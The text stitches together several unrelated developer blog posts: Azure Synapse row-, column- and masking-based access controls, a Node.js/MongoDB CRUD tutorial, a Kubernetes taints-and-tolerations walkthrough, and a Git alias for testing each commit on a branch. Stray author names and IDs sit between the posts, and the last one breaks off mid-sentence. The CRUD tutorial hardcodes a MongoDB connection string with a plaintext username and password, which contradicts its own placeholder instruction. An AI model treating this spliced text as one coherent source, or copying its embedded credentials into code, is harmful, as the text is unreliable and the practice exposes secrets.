## Introduction The assets of a bank are only accessible to some high-ranking officials, and even they don't have access to individual user lockers. These privacy features help build trust among customers. The same goes with in our IT world. Every user wants their sensitive data to be accessible only to themselves, not even available to those with higher privileges within the company. So, as you move data to the cloud, securing the data assets is critical to building trust with your customers and partners. To enable these kinds of preventions, Azure Synapse supports a wide range of advanced access control features to control who can access what data. These features are: - Object-level security - Row-level security - Column-level security - Dynamic data masking - Synapse role-based access control In this blog we will explore these features. --- ## Object-level security In Azure Synapse, whenever we create tables, views, stored procedures, and functions, they are created as objects. In a dedicated SQL pool these objects can be secured by granting specific permissions to database-level users or groups. For example, you can give `SELECT` permissions to user accounts or [database roles](https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver15&preserve-view=true) to give access to specific objects. To assign permission: `GRANT SELECT ON [schema_name].[table_name] TO [user_or_group];` To revoke permission: `REVOKE SELECT ON [schema_name].[table_name] FROM [user_or_group];` Additionally, when you assign a user to [Synapse Administrator RBAC role](https://learn.microsoft.com/en-us/azure/synapse-analytics/security/synapse-workspace-synapse-rbac-roles), they automatically gain full access to all dedicated SQL pools within that workspace. It allows them to perform any action (including managing permissions) across all databases. In Addition, when a user assigned to the Storage Blob Data Contributor role (have READ, WRITE, and EXECUTE permissions) of data lakes and the data lakes is connected to the workspace like Synapse or Databricks, then these permissions automatically applied to the Spark-created tables. This is known as _**Microsoft Entra pass-through**_. See, when Storage Blob Data Contributor role assigned to me: ![Role Assign](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5iudywcmrgt76ud0pmni.jpeg) Then I am able to query my Spark-created table. ![Query Table](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1cwg626sdrtrbvbie9ol.jpeg) But, when I removed that role from myself. Then it gave me an error! ![Unauthorised query access](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/893uoedvodatywlc0vdi.jpeg) --- ## [Row-level security](https://learn.microsoft.com/en-us/sql/relational-databases/security/row-level-security?view=azure-sqldw-latest) ![RLS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kycwjommlkcy0dhw5ypk.png) RLS is a mechanism to restrict row level access (read, write, ...), based on the user's context data. A typical use cases is like, A common database tables used by multiple tenants to store the data, and in such case, we want each tenant to restrict access to their own data only. It enables this fine-grained access control without having to redesign your data warehouse. It also eliminates the need to use `Views` to filter out rows for access control management. > **NOTE**: The access restriction logic is located in the database tier and the database system applies the access restrictions every time when the data is access from any tier. This makes the security system more reliable and robust by reducing the surface area of your security system. <u>_How to implement RLS?_</u> RLS can be implemented by using [SECURITY POLICY](https://learn.microsoft.com/en-us/sql/t-sql/statements/create-security-policy-transact-sql?view=azure-sqldw-latest). RLS is a form of predicate-based access control that works by automatically applying a Security Predicate to all queries on a table. Security Predicate binds the predicate function to the table. Predicate Function is basically a user defined function which determines a user executing the query will have access to the row or not. ![SECURITY POLICY](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aohf9ciaoznjg2or7cfe.png) **There are two types of security predicates:** - **_Filter predicates:_** It silently filters out rows that users shouldn't see during SELECT, UPDATE, and DELETE operations. This is used when you want to hide data without disrupting the user experience. For example, in an employee database, filter predicate is used to ensure salespeople can only see their own customer records. They wouldn't even know about records belonging to other salespeople. - **_Block predicates:_** It explicitly blocking write operations (INSERT, UPDATE, DELETE) that violate pre-defined rules. If a user tries to perform an action that breaks the rules, the operation fails with an error message. This is used where you want to prevent unauthorized modifications. _<u>Implementing Filter Predicates</u>_ **Step 1:** Creating dummy users and tables, and then grant read access to these objects. ``` CREATE SCHEMA Sales GO CREATE TABLE Sales.Region ( id int, SalesRepName nvarchar(50), Region nvarchar(50), CustomerName nvarchar(50) ); -- Inserting data INSERT INTO Sales.Region VALUES (1, 'Mann', 'Central Canada', 'C1'); INSERT INTO Sales.Region VALUES (2, 'Anna', 'East Canada', 'E1'); INSERT INTO Sales.Region VALUES (3, 'Anna', 'East Canada', 'E2'); INSERT INTO Sales.Region VALUES (4, 'Mann', 'Central Canada', 'C2'); INSERT INTO Sales.Region VALUES (6, 'Anna', 'East Canada', 'E3'); -- Creating Users CREATE USER SalesManager WITHOUT LOGIN; CREATE USER Mann WITHOUT LOGIN; CREATE USER Anna WITHOUT LOGIN; -- Granting Read Access to the Users GRANT SELECT ON Sales.Region TO SalesManager; GRANT SELECT ON Sales.Region TO Mann; GRANT SELECT ON Sales.Region TO Anna; ``` **Step 2:** Create Security Filter Predicate Function. ``` --Creating Schema for Security Predicate Function CREATE SCHEMA spf; CREATE FUNCTION spf.securitypredicatefunc(@SaleRepName AS NVARCHAR(50)) RETURNS TABLE WITH SCHEMABINDING AS RETURN SELECT 1 AS securitypredicate_result WHERE @SaleRepName = USER_NAME() OR USER_NAME() = 'SalesManager'; ``` The function returns a table with a single value that is 1, when it satisfies the `WHERE` condition. And `SCHEMABINDING` ensures that the underlying objects (tables, views, etc.) referenced by the function cannot be modified (dropped or altered) while the function exists. **Step 3:** Create Security Policy that Filter Predicate Security and binds the predicate function to the table. ``` CREATE SECURITY POLICY MySalesFilterPolicy ADD FILTER PREDICATE spf.securitypredicatefunc(SalesRepName) ON Sales.Region WITH (STATE = ON); ``` **Step 4:** Test your RLS. ``` EXECUTE AS USER = 'Mann'; SELECT * FROM Sales.Region ORDER BY id; REVERT; ``` When a user (e.g., 'Mann') executes a query on the table, SQL Server automatically invokes the security predicate function for each row in the table. Internally the function is called by SQL Server as part of the query execution plan. So, the permissions required to execute the functions are inherently handled by the SQL Server engine. So, there is no need to explicitly give the permission to functions. ![output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t61fs7whfon1hnrgxzlh.png) **Step 5:** You can disable RLS by Altering the Security Policy. ``` ALTER SECURITY POLICY MySalesFilterPolicy WITH (STATE = OFF); ``` --- ## Column-level security ![CLS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xba3lsu4gyn0ol30r96j.png) It is similar to RLS, but as its name suggests, it applies at the column level. For example, in financial services, only account managers have access to customer social security numbers (SSN), phone numbers, and other personally identifiable information (PII). Additionally, the method of implementing CLS differs. It is implemented by granting Object level Security. _<u>Implementing CLS</u>_ **Step 1:** Creating dummy user and table. ``` CREATE USER TestUser WITHOUT LOGIN; CREATE TABLE Membership ( MemberID int IDENTITY, FirstName varchar(100) NULL, SSN char(9) NOT NULL, LastName varchar(100) NOT NULL, Phone varchar(12) NULL, Email varchar(100) NULL ); ``` **Step 2:** Grant the User to access columns except sensitive columns. ``` GRANT SELECT ON Membership ( MemberID, FirstName, LastName, Phone, Email ) TO TestUser; ``` **Step 3:** Now if the user try to access whole columns, it will give error. ``` EXECUTE AS USER = 'TestUser'; SELECT * FROM Membership; ``` ![Error output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d71ewgznmqihj8yko44h.png) --- ## [Dynamic data masking](https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16#best-practices-and-common-use-cases) ![Dynamic Data Masking](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/onuq98kt4u4gupwtc2hl.png) It is the process of limiting the exposure of sensitive data, to the user who should not have access to viewing it. For example, Customer service agents who need to access customer records but should not see full credit card numbers, which can be masked. **You may ask, why can't we use CLS, or why we don't completely restrict the access?** Because of these reasons: - - A CLS will completely restrict the access of reading and altering columns. But when a masking is applied on a column, it doesn't prevent updates to that column. So, if users receive masked data while querying the masked column, the same users can update the data if they have write permissions. - In masking you can use `SELECT INTO` or `INSERT INTO` to copy data from a masked column into another table that will store as masked data(assuming it's exported by a user without UNMASK privileges). But in CLS you can't do anything, if you don't have access to restricted column. > **NOTE**: - Administrative users and roles (such as sysadmin or db_owner) can always view unmasked data via the CONTROL permission, which includes both the `ALTER ANY MASK` and `UNMASK` permission. - You can grant, or revoke UNMASK permission at the database-level, schema-level, table-level or at the column-level to a user, database role, Microsoft Entra identity or Microsoft Entra group. _<u>Implementing DDM</u>_ **Step 1:** Creating dummy user. `CREATE USER MaskingTestUser WITHOUT LOGIN;` **Step 2:** Create a table and apply the masking on required columns. ``` CREATE SCHEMA Data; GO CREATE TABLE Data.Membership ( FirstName VARCHAR(100) MASKED WITH (FUNCTION = 'partial(1, "xxxxx", 1)') NULL, LastName VARCHAR(100) NOT NULL, Phone VARCHAR(12) MASKED WITH (FUNCTION = 'default()') NULL, Email VARCHAR(100) MASKED WITH (FUNCTION = 'email()') NOT NULL, DiscountCode SMALLINT MASKED WITH (FUNCTION = 'random(1, 100)') NULL ); -- inserting sample data INSERT INTO Data.Membership VALUES ('Kapil', 'Dev', '555.123.4567', 'kapil@team.com', 10); ``` Here, you see I have applied both default and custom masking functions. **Step 3:** Granting the `SELECT` permission on the schema where the table resides. Users view masked data. `GRANT SELECT ON SCHEMA::Data TO MaskingTestUser;` ![Masked Output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qyax1rmytc53gmclnkeu.png) **Step 4:** Granting the `UNMASK` permission allows Users to see unmasked data. `GRANT UNMASK TO MaskingTestUser;` ![Unmasked Output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wiagnr4x3bxy7oehwhbt.png) **Step 5:** Use the `ALTER TABLE` statement to add a mask to an existing column in the table, or to edit the mask on that column. ``` ALTER TABLE Data.Membership ALTER COLUMN LastName ADD MASKED WITH (FUNCTION = 'partial(2,"xxxx",0)'); ALTER TABLE Data.Membership ALTER COLUMN LastName VARCHAR(100) MASKED WITH (FUNCTION = 'default()'); ``` --- ## [Synapse role-based access control](https://learn.microsoft.com/en-us/azure/synapse-analytics/security/synapse-workspace-understand-what-role-you-need) Basically, it leverages the built-in roles to assign permissions to users, groups, or other security principals to manage who can: - Publish code artifacts and list or access published code artifacts. - Execute code on Apache Spark pools and integration runtimes. - Access linked (data) services that are protected by credentials. - Monitor or cancel job executions, review job output and execution logs.
ayush9892
1,917,608
Beginner's Tutorial for CRUD Operations in NodeJS and MongoDB
Introduction CRUD operations stand for Create, Read, Update, and Delete. This procedure...
0
2024-07-16T21:40:48
https://dev.to/danmusembi/beginners-tutorial-for-crud-operations-in-nodejs-and-mongodb-k7k
webdev, javascript, programming, tutorial
## Introduction CRUD operations stand for Create, Read, Update, and Delete. This procedure allows you to work with data from the MongoDB database. With these four operations, you can create, read, update, and delete data in MongoDB. ## What is MongoDB [MongoDB](https://www.mongodb.com/) is a powerful and flexible solution for handling modern data needs. As a leading [NoSQL database](https://www.mongodb.com/resources/basics/databases/nosql-explained), MongoDB offers a dynamic schema design, enabling developers to store and manage data in a way that aligns seamlessly with contemporary application requirements. ## What is Nodejs [Node.js](https://nodejs.org/en/about) is a runtime environment that allows you to run JavaScript on the server side, rather than just in the browser. It's built on Chrome's V8 JavaScript engine, making it fast and efficient. With Node.js, you can build scalable network applications easily, using a single programming language for both client and server-side code. It's especially good for handling many simultaneous connections and real-time applications like chat servers or online games. ## Prequisite - Install Node.js: Download and install Node.js from the official [website](https://nodejs.org/en/about) if you haven't already. - Install MongoDB: Install MongoDB on your machine. Follow the instructions on the official MongoDB [website](https://www.mongodb.com/). ## Step 1: Initialize a new project Open your preferred code editor (VS code) and cd into the directory where you want to create the project, then enter the command below to create a new project. ``` npm init ``` Next, use the command below to install the necessary packages. ``` npm install express mongodb ``` To ensure that everything is working properly, add '"serve": "node index.js"' beneath the script in the package.JSON for starting the program. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/12kx8hhxmx8q55p6411q.PNG) ## Create and test express.js server In the root directory create an `index.js` file and enter the following code in it. ``` const express = require('express') const app = express() app.listen(3000, () =>{ console.log('Server is running on port 3000') }); app.get('/', (req, res) =>{ res.send("Hello Node API") }) ``` In this code, we create a basic Node.js server using the Express framework, which listens on port 3000. When you visit the root URL ("/"), it responds with the message "Hello Node API". Now run the application with the command 'npm run serve' to observe the results, as shown below. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dh0vrvk32qnd8pefexdu.PNG) To test if the server is working enter` localhost:3000` on the browser and see the results as shown below. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pvpcbm2hp6eu5tvitxba.PNG) ## Creating MongoDB connection Visit[ mongodb](https://www.mongodb.com/) and sign in into your account or create one if not yet. Create a new project. Give it a name and click "Create Project." ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/alrubq6ot9x8cb987tr2.PNG) Click the Create button, and then select the free m0 template. Scroll down, give your cluster a name, and click Create deployment. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m8exxrnrm5i6pu4nnsvr.PNG) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/530ah5f8spqwi0fih291.PNG) On the following screen, enter a username and password for your cluster; make sure to copy or remember the password. Click Create Database user. After that click on the Choose a connection method button and select Connect ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b0p4g1h3ya512mfd7k63.PNG) via drivers, copy the connection string. To access mongodb we need a dependency called mongoose, so make sure to install it ` npm i mongoose` and add it at the top in the `index.js` file `const mongoose = require('mongoose');`. Create a `db.js` file in the root directory and paste the following code, replacing <password> with the password you created. ``` const mongoose = require('mongoose'); mongoose.connect("mongodb+srv://admindan:admin1234@crudbackend.5goqnqm.mongodb.net/?retryWrites=true&w=majority&appName=crudbackend") .then(() => { console.log('Connected to the database'); }) .catch((error) => { console.log('Connection failed', error); }); module.exports = mongoose; ``` Import `const mongoose = require('./db');` at the top of the `index.js` file To test if the database is connecting run the application and you should see results on the terminal as shown below. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/whebactnow9cddqez5eu.PNG) ## Creating CRUD functions Now that we've our database connected, we need a model to store our data in the mongodb. Make a models folder in the root directory, then create a file called "product.model.js" and insert the following code into it. ``` const mongoose = require("mongoose"); const ProductSchema = mongoose.Schema( { name: { type: String, required: [true, "Please enter product name"], }, quantity: { type: Number, required: true, default: 0, }, price: { type: Number, required: true, default: 0, }, image: { type: String, required: false, }, }, { timestamps: true, } ); const Product = mongoose.model("Product", ProductSchema); module.exports = Product; ``` - ## Create: defining a function to insert data into mongodb We're creating a function for storing data in our MongoDB collection. Create a controllers folder in the root directory and a file called 'product.controller.js' within it. Paste the following code in it. ``` const Product = require("../models/product.model"); const getProducts = async (req, res) => { try { const products = await Product.find({}); res.status(200).json(products); } catch (error) { res.status(500).json({ message: error.message }); } }; const getProduct = async (req, res) => { try { const { id } = req.params; const product = await Product.findById(id); res.status(200).json(product); } catch (error) { res.status(500).json({ message: error.message }); } }; const createProduct = async (req, res) => { try { const product = await Product.create(req.body); res.status(200).json(product); } catch (error) { res.status(500).json({ message: error.message }); } }; const updateProduct = async (req, res) => { try { const { id } = req.params; const product = await Product.findByIdAndUpdate(id, req.body); if (!product) { return res.status(404).json({ message: "Product not found" }); } const updatedProduct = await Product.findById(id); res.status(200).json(updatedProduct); } catch (error) { res.status(500).json({ message: error.message }); } }; const deleteProduct = async (req, res) => { try { const { id } = req.params; const product = await Product.findByIdAndDelete(id); if (!product) { return res.status(404).json({ message: "Product not found" }); } res.status(200).json({ message: "Product deleted successfully" }); } catch (error) { res.status(500).json({ message: error.message }); } }; module.exports = { getProducts, getProduct, createProduct, updateProduct, deleteProduct, }; ``` In this code, we define CRUD operations for our Product model It includes: - getProducts: Fetches all products. - getProduct: Fetches a product by its ID. - createProduct: Creates a new product with provided data. - updateProduct: Updates a product by its ID. - deleteProduct: Deletes a product by its ID. Each function handles possible errors and returns appropriate HTTP responses. ## Define routes Create a routes folder at the root directory and in it create product.route.js. Insert the below code in it. ``` const express = require("express"); const Product = require("../models/product.model.js"); const router = express.Router(); const {getProducts, getProduct, createProduct, updateProduct, deleteProduct} = require('../controllers/product.controller.js'); router.get('/', getProducts); router.get("/:id", getProduct); router.post("/", createProduct); // update a product router.put("/:id", updateProduct); // delete a product router.delete("/:id", deleteProduct); module.exports = router; ``` In this code, we set up Express routes for CRUD operations for our Product model. it imports the necessary modules, creates an Express router, and defines routes for: Fetching all products (GET /). Fetching a single product by ID (GET /:id). Creating a new product (POST /). Updating a product by ID (PUT /:id). Deleting a product by ID (DELETE /:id). Finally, it exports the router for use in the main application. ## Testing your API Now that we've created our CRUD operations, let's test them. We are going to use [insomnia](https://app.insomnia.rest/app/dashboard/organizations) if you don't have it you can download and create an account. Follow the steps outlined below to test create operation ( POST REQUEST). - Open Insomnia: Launch the Insomnia application. - Create a New Request: Click on the "+" button to create a new request. - Set Request Type: Select "POST" from the dropdown menu next to the request name. - Enter URL: Input the URL of your API endpoint ( http://localhost:3000/api/products) - Enter Request Body: Click on the "Body" tab, select "JSON," and enter the JSON data you want to send. - Send Request: Click the "Send" button to send the request to the server. - View Response: Inspect the response from the server in the lower pane of Insomnia. The api for creating a product on the MongoDB was successful, as indicated by the status 200 ok in the image below, which illustrates how it should operate. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/969ppxgws45d6dypvpz6.PNG) Thus, you ought to be able to view the item created when you navigate to the database and select Browse Collection. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cqqrn3xo64rgfnpfkm27.PNG) ## Test Read operations The technique of testing a get request is almost the same as what we discussed above; you make a new request and select GET from the dropdown menu. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/arf1pnvdl0njv47gklst.PNG) Proceed to try the final two options, which are update and remove (PUT, DELETE) from the dropdown menu. ## Conclusion With this beginner's tutorial, you should now have a solid foundation for performing CRUD operations using NodeJS and MongoDB. For more tech insights, follow me on [X](https://x.com/musembiwebdev) and connect on [LinkedIn](https://www.linkedin.com/in/daniel-musembi-a05852283/).
danmusembi
1,917,618
40 Days Of Kubernetes (14/40)
Day 14/40 Taints and Tolerations in Kubernetes Video Link @piyushsachdeva Git...
0
2024-07-15T17:31:43
https://dev.to/sina14/40-days-of-kubernetes-1440-m3a
kubernetes, 40daysofkubernetes
## Day 14/40 # Taints and Tolerations in Kubernetes [Video Link](https://www.youtube.com/watch?v=nwoS2tK2s6Q) @piyushsachdeva [Git Repository](https://github.com/piyushsachdeva/CKA-2024/) [My Git Repo](https://github.com/sina14/40daysofkubernetes) We're going to look at `taint` and `toleration`. While a `node` has a `label` it means it has `taint` for scheduling a `workload` with that specific `label` and doesn't `tolerate` other workloads to be scheduling on itself. We taint `node` and tell a `pod` to tolerate that `taint` to be scheduled on that `node`. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ck9ietgj62m4ffr6dkf.png) (Photo from the video) "Tolerations are applied to pods. Tolerations allow the scheduler to schedule pods with matching taints. Tolerations allow scheduling but don't guarantee scheduling: the scheduler also evaluates other parameters as part of its function. Taints and tolerations work together to ensure that pods are not scheduled onto inappropriate nodes. One or more taints are applied to a node; this marks that the node should not accept any pods that do not tolerate the taints." **Note** There are two special cases: - An empty `key` with operator `Exists` matches all keys, values and effects which means this will tolerate everything. - An empty `effect` matches all effects with key `key1`. The allowed values for the `effect` field are: - NoExecute > for newer and existing pods - NoSchedule > for newer pods - PreferNoSchedule > No Guaranteed [source](https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) A toleration is essentially the counter to a taint, allowing a pod to ignore taints applied to a node. A toleration is defined in the pod specification and must match the key, value, and effect of the taint it intends to tolerate. **Toleration Operators**: While matching taints, tolerations can use operators like Equal and Exists. The Equal operator requires an exact match of key, value, and effect , whereas the Exists operator matches a taint based on the key alone, disregarding the value. For instance: ``` tolerations: - key: "key" operator: "Equal" value: "value" effect: "NoSchedule" ``` [source](https://overcast.blog/mastering-kubernetes-taints-and-tolerations-08756d5faf55) --- #### 1. Taint the node ```console root@localhost:~# kubectl get nodes NAME STATUS ROLES AGE VERSION lucky-luke-control-plane Ready control-plane 8d v1.30.0 lucky-luke-worker Ready <none> 8d v1.30.0 lucky-luke-worker2 Ready <none> 8d v1.30.0 root@localhost:~# kubectl taint node lucky-luke-worker gpu=true:NoSchedule node/lucky-luke-worker tainted root@localhost:~# kubectl taint node lucky-luke-worker2 gpu=true:NoSchedule node/lucky-luke-worker2 tainted root@localhost:~# kubectl describe node lucky-luke-worker | grep -i taints Taints: gpu=true:NoSchedule ``` - Let's schedule a `pod` ```console root@localhost:~# kubectl run nginx --image=nginx pod/nginx created root@localhost:~# kubectl get pods NAME READY STATUS RESTARTS AGE nginx 0/1 Pending 0 6s ``` It says it's in `Pending` status, so let's see the error message of the pod: ```console root@localhost:~# kubectl describe pod nginx Name: nginx Namespace: default Priority: 0 Service Account: default Node: <none> Labels: run=nginx Annotations: <none> Status: Pending IP: IPs: <none> Containers: nginx: Image: nginx Port: <none> Host Port: <none> Environment: <none> Mounts: /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-4xh8p (ro) Conditions: Type Status PodScheduled False Volumes: kube-api-access-4xh8p: Type: Projected (a volume that contains injected data from multiple sources) TokenExpirationSeconds: 3607 ConfigMapName: kube-root-ca.crt ConfigMapOptional: <nil> DownwardAPI: true QoS Class: BestEffort Node-Selectors: <none> Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s node.kubernetes.io/unreachable:NoExecute op=Exists for 300s Events: Type Reason Age From Message ---- ------ ---- ---- ------- Warning FailedScheduling 89s default-scheduler 0/3 nodes are available: 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }, 2 node(s) had untolerated taint {gpu: true}. preemption: 0/3 nodes are available: 3 Preemption is not helpful for scheduling. ``` And the message is clear to us :) ``` 0/3 nodes are available. 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: } 2 node(s) had untolerated taint {gpu: true} 0/3 nodes are available: 3 Preemption is not helpful for scheduling. ``` - We need create toleration on a `pod` to be scheduled ```console root@localhost:~# kubectl run redis --image=redis --dry-run=client -o yaml > redis_day14.yaml root@localhost:~# vim redis_day14.yaml ``` Adding `tolerations` to `yaml` file: ```yaml apiVersion: v1 kind: Pod metadata: creationTimestamp: null labels: run: redis name: redis spec: containers: - image: redis name: redis resources: {} dnsPolicy: ClusterFirst restartPolicy: Always tolerations: - key: "gpu" operator: "Equal" value: "true" effect: "NoSchedule" status: {} ``` Apply the file: ```console root@localhost:~# kubectl apply -f redis_day14.yaml pod/redis created root@localhost:~# kubectl get pods NAME READY STATUS RESTARTS AGE nginx 0/1 Pending 0 10m redis 1/1 Running 0 5s root@localhost:~# kubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES nginx 0/1 Pending 0 10m <none> <none> <none> <none> redis 1/1 Running 0 17s 10.244.2.12 lucky-luke-worker2 <none> <none> ``` Let's delete the taint of one node and see what will happen to our pending `pod`: ```console root@localhost:~# kubectl taint node lucky-luke-worker gpu=true:NoSchedule- node/lucky-luke-worker untainted root@localhost:~# kubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES nginx 1/1 Running 0 22m 10.244.1.14 lucky-luke-worker <none> <none> redis 1/1 Running 0 11m 10.244.2.12 lucky-luke-worker2 <none> <none> ``` - By default, the `control-plane` node has taint `NoSchedule` ```console root@localhost:~# kubectl get nodes NAME STATUS ROLES AGE VERSION lucky-luke-control-plane Ready control-plane 8d v1.30.0 lucky-luke-worker Ready <none> 8d v1.30.0 lucky-luke-worker2 Ready <none> 8d v1.30.0 root@localhost:~# kubectl describe node lucky-luke-control-plane | grep Taint Taints: node-role.kubernetes.io/control-plane:NoSchedule ``` --- #### Selector Instead a `node` can decide which type `pod` to accept, it will give the decision to a `pod` to which `node` can deployed on. - Let's try: ```console root@localhost:~# kubectl run nginx2 --image=nginx --dry-run=client -o yaml > nginx2-day14.yaml root@localhost:~# vim nginx2-day14.yaml ``` ```yaml apiVersion: v1 kind: Pod metadata: creationTimestamp: null labels: run: nginx2 name: nginx2 spec: containers: - image: nginx name: nginx2 resources: {} dnsPolicy: ClusterFirst restartPolicy: Always nodeSelector: gpu: "false" status: {} ``` ```console root@localhost:~# kubectl apply -f nginx2-day14.yaml pod/nginx2 created root@localhost:~# kubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES nginx 1/1 Running 0 46m 10.244.1.14 lucky-luke-worker <none> <none> nginx2 0/1 Pending 0 8s <none> <none> <none> <none> redis 1/1 Running 0 35m 10.244.2.12 lucky-luke-worker2 <none> <none> ``` - Label one node and let's see what will happen: ```console root@localhost:~# kubectl label node lucky-luke-worker gpu="false" node/lucky-luke-worker labeled root@localhost:~# kubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES nginx 1/1 Running 0 49m 10.244.1.14 lucky-luke-worker <none> <none> nginx2 1/1 Running 0 3m21s 10.244.1.15 lucky-luke-worker <none> <none> redis 1/1 Running 0 38m 10.244.2.12 lucky-luke-worker2 <none> <none> ```
sina14
1,917,900
Test that forking code!
Originally published on peateasea.de. Not only should the final commit in a pull request patch...
0
2024-07-13T14:45:34
https://peateasea.de/test-that-forking-code/
git, bash, python
--- title: Test that forking code! published: true date: 2024-07-08 22:00:00 UTC tags: Git,Bash,Python canonical_url: https://peateasea.de/test-that-forking-code/ cover_image: https://peateasea.de/assets/images/git-fork-all-tested.png --- *Originally published on [peateasea.de](https://peateasea.de/test-that-forking-code/).* Not only should the final commit in a pull request patch series pass all its tests but also each commit back to where the pull request branched from `main`. A Git alias helps to automate this process. Introducing: `git test-fork`. I take pride in delivering quality code in my pull requests, be it either for clients,<sup id="fnref:hire-me" role="doc-noteref"><a href="#fn:hire-me" rel="footnote">1</a></sup> or for open source software submissions. One aspect of that quality is to deliver small chunks of working functionality in each commit. To ensure that a pull request has this property, I like to ensure that each commit builds correctly, that the test suite passes and, depending on the project, that the linter checks also all pass. Of course, for a multi-commit pull request checking each commit manually is a lot of work. To avoid unnecessary work, I’ve automated this process with a Git alias: `git test-fork`. Here’s why I use it and how its inner workings, erm, work. ## My main focus: quality Have you ever been doing [software archaeology](https://en.wikipedia.org/wiki/Software_archaeology) on a codebase and wondered why the test suite on an old commit suddenly no longer works? And have you then spent the next several hours trying to work out what the test failures have to do with the bug only to find out that they’re not related? If so, you know how annoying if not downright painful such a situation is. Also, you’ll know how stressful this can be because you’re usually under pressure when bug-hunting and wild goose chases are the last thing you need. Wouldn’t it have been nice if those who came before you<sup id="fnref:they-could-be-you" role="doc-noteref"><a href="#fn:they-could-be-you" rel="footnote">2</a></sup> had ensured that the test suite passed at every commit? This would have saved you time, stress and grey hairs. Also, this would have reduced friction in your bug-hunting, letting you find (and hopefully solve!) the bug earlier. Instead, you went on a minor odyssey, delving into problems unrelated to those you were actually trying to solve. I’ve had that kind of experience one too many times in the past. My solution: make sure that each and every commit in a pull request passes its test suite and, if relevant, passes the project’s linter tests. Before I [show the command and explain how its internals work](#automatically-testing-forks-via-git), why do I think going to this effort is worth it? To me, a passing test suite is a sign of quality and that whoever wrote the code cared enough to submit robust, well-tested code. It’s sort of like a craftsperson taking the time to build in quality and taking pride in their work and a job well done. Software isn’t a work of art in the way that [Biedermeier furniture](https://en.wikipedia.org/wiki/Biedermeier#Furniture_design_and_interior_decorating) or a [Stradivarius violin](https://en.wikipedia.org/wiki/Stradivarius) is, however a strong focus on quality and [craftsmanship](https://en.wikipedia.org/wiki/Software_craftsmanship) (for want of a better word) makes for better software. A codebase in which each commit passes its tests has technical benefits: it’s possible to use [`git bisect`](https://git-scm.com/docs/git-bisect) automatically and any commit could be pushed to production at any time, affording a high level of development flexibility and responsiveness. Personally, I like the feeling of a solid foundation; it’s something I know I can depend upon and build upon. ## Swings and roundabouts Of course, running the full test suite on each commit has its downsides. It slows you down and some might feel that it adds unnecessary friction to the development workflow, especially when the test suite is slow. Others might feel that it’s just another exercise in gold plating or some kind of over-the-top obsessive programmer behaviour. These are valid points and there needs to be a balance between a desire for high quality and getting code “out the door”. After all, one can go too far and being extremist about things is usually a bad sign. That being said, sometimes it’s a good idea to slow down when developing software so that our brains can mull over what we’re doing and contemplate the bigger picture. There have been times when I’ve been running the tests on each commit for a given branch and have realised that a commit wasn’t necessary, or the idea behind a direction of development was plain wrong. This extra cogitation time allowed me to rethink what I was doing and ultimately led to better software. Also, by _not_ submitting some code, I saved my colleagues’ time, because it was code they _didn’t_ have to review! Sometimes, ensuring that each commit passes the test suite along a feature branch picks up on things I’d missed during development and should have fixed. Recently, I was refactoring some code and had finished a long-ish feature branch. I ran the tests together with the linter checks and the linter spotted a bug: while renaming a module I’d not updated the imports in a file. This was the code “talking” to me. It showed that I’d missed a particular code change _and_ that there was a hole in my test coverage. This was a big win because it gave me the opportunity to improve the tests which will reduce risk and friction when refactoring in the future. Also, if you notice that it takes _ages_ to test each commit on a feature branch, then this is not a hint that you shouldn’t be testing each commit, but a sign that the test suite is too slow. That’s something that you could invest time in in the future. It’s like an application of [“if it hurts, do it more often”](https://martinfowler.com/bliki/FrequencyReducesDifficulty.html). Another criticism of this technique is that it takes a long time on branches with many commits. This is a good thing: it provides feedback to you to keep your pull requests and feature branches small and focused. Again, “if it hurts, do it more often”! ## Automatically testing forks via Git Obviously, testing all commits on a fork of the `main` branch isn’t something one wants to do manually. A single commit? Fine. Ten commits on a feature branch? Nah, I’ll pass, thanks. :smiley: So how do you know when the current branch forked from the `main` branch? And how do you make Git run tests on each commit? Let’s get to that now. Here’s the alias I have set up in my `.gitconfig`: ```shell test-fork = !"f() { \ [x$# = x1] && testcmd=\"$1\" || testcmd='make test'; \ upstream_base_branch=$(git branch --remotes | grep 'origin/\\(HEAD\\|master\\|main\\)' | cut -d'>' -f2 | head -n 1); \ current_branch=$(git rev-parse --abbrev-ref HEAD); \ fork_point=$(git merge-base --fork-point $upstream_base_branch $current_branch); \ git rebase $fork_point -x \"git log -1 --oneline; $testcmd\"; \ }; f" ``` There’s a lot going on in here, so I tried representing it as a diagram: 